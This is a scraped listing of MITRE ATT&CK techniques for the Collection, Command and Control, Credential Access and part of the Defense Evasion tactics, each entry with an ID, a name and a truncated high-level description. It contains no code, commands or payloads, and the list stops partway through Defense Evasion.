| ID | Tactic | Technique | Description |
|---|---|---|---|
| T1005 | Collection | Data from Local System | Adversaries may search local system sources, such as file systems, configuration files, local databases, virtual machine files, or process memory, to find files of interest … |
| T1025 | Collection | Data from Removable Media | Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media … |
| T1039 | Collection | Data from Network Shared Drive | Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared … |
| T1056 | Collection | Input Capture | Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different … |
| T1056.001 | Collection | Keylogging | Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access … |
| T1056.002 | Collection | GUI Input Capture | Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional … |
| T1056.003 | Collection | Web Portal Capture | Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log … |
| T1056.004 | Collection | Credential API Hooking | Adversaries may hook into Windows application programming interface (API) functions and Linux system functions to collect user credentials. Malicious hooking mechanisms may capture API or … |
| T1074 | Collection | Data Staged | Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one … |
| T1074.001 | Collection | Local Data Staging | Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files … |
| T1074.002 | Collection | Remote Data Staging | Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in … |
| T1113 | Collection | Screen Capture | Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included … |
| T1114 | Collection | Email Collection | Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to … |
| T1114.001 | Collection | Local Email Collection | Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user's local system, such … |
| T1114.002 | Collection | Remote Email Collection | Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information. Adversaries may leverage a user's credentials and interact directly with … |
| T1114.003 | Collection | Email Forwarding Rule | Adversaries may set up email forwarding rules to collect sensitive information. Adversaries may abuse email forwarding rules to monitor the activities of a victim, steal information, … |
| T1115 | Collection | Clipboard Data | Adversaries may collect data stored in the clipboard from users copying information within or between applications. For example, on Windows adversaries can access clipboard data … |
| T1119 | Collection | Automated Collection | Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use … |
| T1123 | Collection | Audio Capture | An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for … |
| T1125 | Collection | Video Capture | An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the … |
| T1185 | Collection | Browser Session Hijacking | Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various … |
| T1213 | Collection | Data from Information Repositories | Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information … |
| T1213.001 | Collection | Confluence | Adversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, … |
| T1213.002 | Collection | Sharepoint | Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about … |
| T1213.003 | Collection | Code Repositories | Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted … |
| T1213.004 | Collection | Customer Relationship Management Software | Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is used to assist organizations in tracking and managing customer interactions, … |
| T1213.005 | Collection | Messaging Applications | Adversaries may leverage chat and messaging applications, such as Microsoft Teams, Google Chat, and Slack, to mine valuable information. The following is a brief list … |
| T1213.006 | Collection | Databases | Adversaries may leverage databases to mine valuable information. These databases may be hosted on-premises or in the cloud (both in platform-as-a-service and software-as-a-service environments). Examples … |
| T1530 | Collection | Data from Cloud Storage | Adversaries may access data from cloud storage. Many IaaS providers offer solutions for online data object storage such as Amazon S3, Azure Storage, and Google … |
| T1560 | Collection | Archive Collected Data | An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize … |
| T1560.001 | Collection | Archive via Utility | Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into … |
| T1560.002 | Collection | Archive via Library | An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including … |
| T1560.003 | Collection | Archive via Custom Method | An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, … |
| T1602 | Collection | Data from Configuration Repository | Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control … |
| T1602.001 | Collection | SNMP (MIB Dump) | Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP). The … |
| T1602.002 | Collection | Network Device Configuration Dump | Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that … |
| ID | Tactic | Technique | Description |
|---|---|---|---|
| T1001 | Command and Control | Data Obfuscation | Adversaries may obfuscate command and control traffic to make it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November 2020) Command and control (C2) communications are … |
| T1001.001 | Command and Control | Junk Data | Adversaries may add junk data to protocols used for command and control to make detection more difficult.(Citation: FireEye SUNBURST Backdoor December 2020) By adding random … |
| T1001.002 | Command and Control | Steganography | Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data … |
| T1001.003 | Command and Control | Protocol or Service Impersonation | Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control activity and thwart analysis efforts. By impersonating legitimate protocols or web … |
| T1008 | Command and Control | Fallback Channels | Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and … |
| T1024 | Command and Control | Custom Cryptographic Protocol | Adversaries may use a custom cryptographic protocol or algorithm to hide command and control traffic. A simple scheme, such as XOR-ing the plaintext with a … |
| T1026 | Command and Control | Multiband Communication | **This technique has been deprecated and should no longer be used.** Some adversaries may split communications between different protocols. There could be one protocol for … |
| T1032 | Command and Control | Standard Cryptographic Protocol | Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication … |
| T1043 | Command and Control | Commonly Used Port | **This technique has been deprecated. Please use [Non-Standard Port](https://attack.mitre.org/techniques/T1571) where appropriate.** Adversaries may communicate over a commonly used port to bypass firewalls or network detection … |
| T1065 | Command and Control | Uncommonly Used Port | Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured. |
| T1071 | Command and Control | Application Layer Protocol | Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often … |
| T1071.001 | Command and Control | Web Protocols | Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote … |
| T1071.002 | Command and Control | File Transfer Protocols | Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote … |
| T1071.003 | Command and Control | Mail Protocols | Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the … |
| T1071.004 | Command and Control | DNS | Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the … |
| T1071.005 | Command and Control | Publish/Subscribe Protocols | Adversaries may communicate using publish/subscribe (pub/sub) application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and … |
| T1079 | Command and Control | Multilayer Encryption | An adversary performs C2 communications using multiple layers of encryption, typically (but not exclusively) tunneling a custom encryption scheme within a protocol encryption scheme such … |
| T1090 | Command and Control | Proxy | Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control … |
| T1090.001 | Command and Control | Internal Proxy | Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that … |
| T1090.002 | Command and Control | External Proxy | Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to … |
| T1090.003 | Command and Control | Multi-hop Proxy | Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic … |
| T1090.004 | Command and Control | Domain Fronting | Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of … |
| T1092 | Command and Control | Communication Through Removable Media | Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system.(Citation: ESET Sednit … |
| T1094 | Command and Control | Custom Command and Control Protocol | Adversaries may communicate using a custom command and control protocol instead of encapsulating commands/data in an existing [Application Layer Protocol](https://attack.mitre.org/techniques/T1071). Implementations include mimicking well-known protocols … |
| T1095 | Command and Control | Non-Application Layer Protocol | Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of … |
| T1102 | Command and Control | Web Service | Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites, cloud services, and social … |
| T1102.001 | Command and Control | Dead Drop Resolver | Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, … |
| T1102.002 | Command and Control | Bidirectional Communication | Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the … |
| T1102.003 | Command and Control | One-Way Communication | Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the … |
| T1104 | Command and Control | Multi-Stage Channels | Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate … |
| T1105 | Command and Control | Ingress Tool Transfer | Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled … |
| T1132 | Command and Control | Data Encoding | Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded … |
| T1132.001 | Command and Control | Standard Encoding | Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and … |
| T1132.002 | Command and Control | Non-Standard Encoding | Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and … |
| T1172 | Command and Control | Domain Fronting | Domain fronting takes advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of … |
| T1188 | Command and Control | Multi-hop Proxy | To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic … |
| T1219 | Command and Control | Remote Access Tools | An adversary may use legitimate remote access tools to establish an interactive command and control channel within a network. Remote access tools create a session … |
| T1219.001 | Command and Control | IDE Tunneling | Adversaries may abuse Integrated Development Environment (IDE) software with remote development features to establish an interactive command and control channel on target systems within a … |
| T1219.002 | Command and Control | Remote Desktop Software | An adversary may use legitimate desktop support software to establish an interactive command and control channel to target systems within networks. Desktop support software provides … |
| T1219.003 | Command and Control | Remote Access Hardware | An adversary may use legitimate remote access hardware to establish an interactive command and control channel to target systems within networks. These services, including IP-based … |
| T1483 | Command and Control | Domain Generation Algorithms | Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination for command and control traffic rather than relying on a list … |
| T1568 | Command and Control | Dynamic Resolution | Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares … |
| T1568.001 | Command and Control | Fast Flux DNS | Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single … |
| T1568.002 | Command and Control | Domain Generation Algorithms | Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a … |
| T1568.003 | Command and Control | DNS Calculation | Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than … |
| T1571 | Command and Control | Non-Standard Port | Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or … |
| T1572 | Command and Control | Protocol Tunneling | Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable … |
| T1573 | Command and Control | Encrypted Channel | Adversaries may employ an encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite … |
| T1573.001 | Command and Control | Symmetric Cryptography | Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication … |
| T1573.002 | Command and Control | Asymmetric Cryptography | Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication … |
| T1665 | Command and Control | Hide Infrastructure | Adversaries may manipulate network traffic in order to hide and evade detection of their C2 infrastructure. This can be accomplished by identifying and filtering traffic … |
T1003
Credential AccessOS Credential Dumping
Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. …
T1003.001
Credential AccessLSASS Memory
Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, …
T1003.002
Credential AccessSecurity Account Manager
Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the …
T1003.003
Credential AccessNTDS
Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain …
T1003.004
Credential AccessLSA Secrets
Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, …
T1003.005
Credential AccessCached Domain Credentials
Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached …
T1003.006
Credential AccessDCSync
Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: …
T1003.007
Credential AccessProc Filesystem
Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for …
T1003.008
Credential Access/etc/passwd and /etc/shadow
Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of …
T1040
Credential AccessNetwork Sniffing
Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the …
T1081
Credential AccessCredentials in Files
Adversaries may search local file systems and remote file shares for files containing passwords. These can be files created by users to store their own …
T1110
Credential AccessBrute Force
Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec …
T1110.001
Credential AccessPassword Guessing
Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the …
T1110.002
Credential AccessPassword Cracking
Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS …
T1110.003
Credential AccessPassword Spraying
Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying …
T1110.004
Credential AccessCredential Stuffing
Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username …
T1111
Credential AccessMulti-Factor Authentication Interception
Adversaries may target multi-factor authentication (MFA) mechanisms, (i.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, …
T1139
Credential AccessBash History
Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to …
T1141
Credential AccessInput Prompt
When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt …
T1142
Credential AccessKeychain
Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, …
T1145
Credential AccessPrivate Keys
Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures. (Citation: Wikipedia Public Key Crypto) Adversaries may gather private keys from compromised …
T1167
Credential AccessSecurityd Memory
In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these …
T1171
Credential AccessLLMNR/NBT-NS Poisoning and Relay
Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based …
T1174
Credential AccessPassword Filter DLL
Windows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as dynamic link libraries (DLLs) containing a method …
T1187
Credential AccessForced Authentication
Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept. The …
T1208
Credential AccessKerberoasting
Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with …
T1212
Credential AccessExploitation for Credential Access
Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming …
T1214
Credential AccessCredentials in Registry
The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and …
T1503
Credential AccessCredentials from Web Browsers
Adversaries may acquire credentials from web browsers by reading files specific to the target browser. (Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials …
T1522
Credential AccessCloud Instance Metadata API
Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data. Most cloud service providers support a Cloud Instance …
T1528
Credential AccessSteal Application Access Token
Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources. Application access tokens are used to make …
T1539
Credential AccessSteal Web Session Cookie
An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated …
T1552
Credential AccessUnsecured Credentials
Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, …
T1552.001
Credential AccessCredentials In Files
Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store …
T1552.002
Credential AccessCredentials in Registry
Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system …
T1552.003
Credential AccessShell History
Adversaries may search the command history on compromised systems for insecurely stored credentials. On Linux and macOS systems, shells such as Bash and Zsh keep …
T1552.004
Credential AccessPrivate Keys
Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, …
T1552.005
Credential AccessCloud Instance Metadata API
Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data. Most cloud service providers support a Cloud Instance …
T1552.006
Credential AccessGroup Policy Preferences
Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. …
T1552.007
Credential AccessContainer API
Adversaries may gather credentials via APIs within a containers environment. APIs in these environments, such as the Docker API and Kubernetes APIs, allow a user …
T1552.008
Credential AccessChat Messages
Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such …
T1555
Credential AccessCredentials from Password Stores
Adversaries may search for common password storage locations to obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored in several places on a system, depending …
T1555.001
Credential AccessKeychain
Adversaries may acquire credentials from Keychain. Keychain (or Keychain Services) is the macOS credential management system that stores account names, passwords, private keys, certificates, sensitive …
T1555.002
Credential AccessSecurityd Memory
An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and …
T1555.003
Credential AccessCredentials from Web Browsers
Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such …
T1555.004
Credential AccessWindows Credential Manager
Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through …
T1555.005
Credential AccessPassword Managers
Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in …
T1555.006
Credential AccessCloud Secrets Management Stores
Adversaries may acquire credentials from cloud-native secret management solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault, and Terraform Vault. Secrets managers …
T1556
Credential AccessModify Authentication Process
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, …
T1556.001
Credential AccessDomain Controller Authentication
Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts. Malware may be used …
T1556.002
Credential AccessPassword Filter DLL
Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated. Windows password filters …
T1556.003
Credential AccessPluggable Authentication Modules
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration …
T1556.004
Credential AccessNetwork Device Authentication
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on …
T1556.005
Credential AccessReversible Encryption
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption …
T1556.006
Credential AccessMulti-Factor Authentication
Adversaries may disable or modify multi-factor authentication (MFA) mechanisms to enable persistent access to compromised accounts. Once adversaries have gained access to a network by …
T1556.007
Credential AccessHybrid Identity
Adversaries may patch, modify, or otherwise backdoor cloud authentication processes that are tied to on-premises user identities in order to bypass typical authentication mechanisms, access …
T1556.008
Credential AccessNetwork Provider DLL
Adversaries may register malicious network provider dynamic link libraries (DLLs) to capture cleartext user credentials during the authentication process. Network provider DLLs allow Windows to …
T1556.009
Credential Access: Conditional Access Policies
Adversaries may disable or modify conditional access policies to enable persistent access to compromised accounts. Conditional access policies are additional verifications used by identity providers …
T1557
Credential Access: Adversary-in-the-Middle
Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040), …
T1557.001
Credential Access: LLMNR/NBT-NS Poisoning and SMB Relay
By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity …
T1557.002
Credential Access: ARP Cache Poisoning
Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used …
T1557.003
Credential Access: DHCP Spoofing
Adversaries may redirect network traffic to adversary-owned systems by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting as a malicious DHCP server on the …
T1557.004
Credential Access: Evil Twin
Adversaries may host seemingly genuine Wi-Fi access points to deceive users into connecting to malicious networks as a way of supporting follow-on behaviors such as …
T1558
Credential Access: Steal or Forge Kerberos Tickets
Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used …
T1558.001
Credential Access: Golden Ticket
Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation: AdSecurity Kerberos GT Aug 2015) …
T1558.002
Credential Access: Silver Ticket
Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as …
T1558.003
Credential Access: Kerberoasting
Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to …
T1558.004
Credential Access: AS-REP Roasting
Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002) Kerberos messages.(Citation: Harmj0y Roasting AS-REPs Jan 2017) Preauthentication offers protection against …
T1558.005
Credential Access: Ccache Files
Adversaries may attempt to steal Kerberos tickets stored in credential cache files (or ccache). These files are used for short term storage of a user's …
T1606
Credential Access: Forge Web Credentials
Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud …
T1606.001
Credential Access: Web Cookies
Adversaries may forge web cookies that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud …
T1606.002
Credential Access: SAML Tokens
An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default …
T1621
Credential Access: Multi-Factor Authentication Request Generation
Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users. Adversaries in possession of …
T1649
Credential Access: Steal or Forge Authentication Certificates
Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages …
T1006
Defense Evasion: Direct Volume Access
Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. …
T1009
Defense Evasion: Binary Padding
Adversaries can use binary padding to add junk data and change the on-disk representation of malware without affecting the functionality or behavior of the binary. …
T1014
Defense Evasion: Rootkit
Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the …
T1027
Defense Evasion: Obfuscated Files or Information
Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system …
T1027.001
Defense Evasion: Binary Padding
Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or …
T1027.002
Defense Evasion: Software Packing
Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. …
T1027.003
Defense Evasion: Steganography
Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media …
T1027.004
Defense Evasion: Compile After Delivery
Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert …
T1027.005
Defense Evasion: Indicator Removal from Tools
Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing …
T1027.006
Defense Evasion: HTML Smuggling
Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary …
T1027.007
Defense Evasion: Dynamic API Resolution
Adversaries may obfuscate then dynamically resolve API functions called by their malware in order to conceal malicious functionalities and impair defensive analysis. Malware commonly uses …
T1027.008
Defense Evasion: Stripped Payloads
Adversaries may attempt to make a payload difficult to analyze by removing symbols, strings, and other human readable information. Scripts and executables may contain variables …
T1027.009
Defense Evasion: Embedded Payloads
Adversaries may embed payloads within other files to conceal malicious content from defenses. Otherwise seemingly benign files (such as scripts and executables) may be abused …
T1027.010
Defense Evasion: Command Obfuscation
Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more …
T1027.011
Defense Evasion: Fileless Storage
Adversaries may store data in "fileless" formats to conceal malicious activity from defenses. Fileless storage can be broadly defined as any format other than a …
T1027.012
Defense Evasion: LNK Icon Smuggling
Adversaries may smuggle commands to download malicious payloads past content filters by hiding them within otherwise seemingly benign windows shortcut files. Windows shortcut files (.LNK) …
T1027.013
Defense Evasion: Encrypted/Encoded File
Adversaries may encrypt or encode files to obfuscate strings, bytes, and other specific patterns to impede detection. Encrypting and/or encoding file content aims to conceal …
T1027.014
Defense Evasion: Polymorphic Code
Adversaries may utilize polymorphic code (also known as metamorphic or mutating code) to evade detection. Polymorphic code is a type of software capable of changing …
T1027.015
Defense Evasion: Compression
Adversaries may use compression to obfuscate their payloads or files. Compressed file formats such as ZIP, gzip, 7z, and RAR can compress and archive multiple …
T1027.016
Defense Evasion: Junk Code Insertion
Adversaries may use junk code / dead code to obfuscate a malware’s functionality. Junk code is code that either does not execute, or if it …
T1027.017
Defense Evasion: SVG Smuggling
Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign SVG files.(Citation: Trustwave SVG Smuggling 2025) SVGs, or …
T1036
Defense Evasion: Masquerading
Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the …
T1036.001
Defense Evasion: Invalid Code Signature
Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a …
T1036.002
Defense Evasion: Right-to-Left Override
Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is …
T1036.003
Defense Evasion: Rename Legitimate Utilities
Adversaries may rename legitimate / system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may …
T1036.004
Defense Evasion: Masquerade Task or Service
Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler …
T1036.005
Defense Evasion: Match Legitimate Resource Name or Location
Adversaries may match or approximate the name or location of legitimate files, Registry keys, or other resources when naming/placing them. This is done for the …
T1036.006
Defense Evasion: Space after Filename
Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app …
T1036.007
Defense Evasion: Double File Extension
Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary …
T1036.008
Defense Evasion: Masquerade File Type
Adversaries may masquerade malicious payloads as legitimate files through changes to the payload's formatting, including the file’s signature, extension, icon, and contents. Various file types …
T1036.009
Defense Evasion: Break Process Trees
An adversary may attempt to evade process tree-based analysis by modifying executed malware's parent process ID (PPID). If endpoint protection software leverages the "parent-child" relationship …
T1036.010
Defense Evasion: Masquerade Account Name
Adversaries may match or approximate the names of legitimate accounts to make newly created ones appear benign. This will typically occur during [Create Account](https://attack.mitre.org/techniques/T1136), although …
T1036.011
Defense Evasion: Overwrite Process Arguments
Adversaries may modify a process's in-memory arguments to change its name in order to appear as a legitimate or benign process. On Linux, the operating …
T1036.012
Defense Evasion: Browser Fingerprint
Adversaries may attempt to blend in with legitimate traffic by spoofing browser and system attributes like operating system, system language, platform, user-agent string, resolution, time …
T1045
Defense Evasion: Software Packing
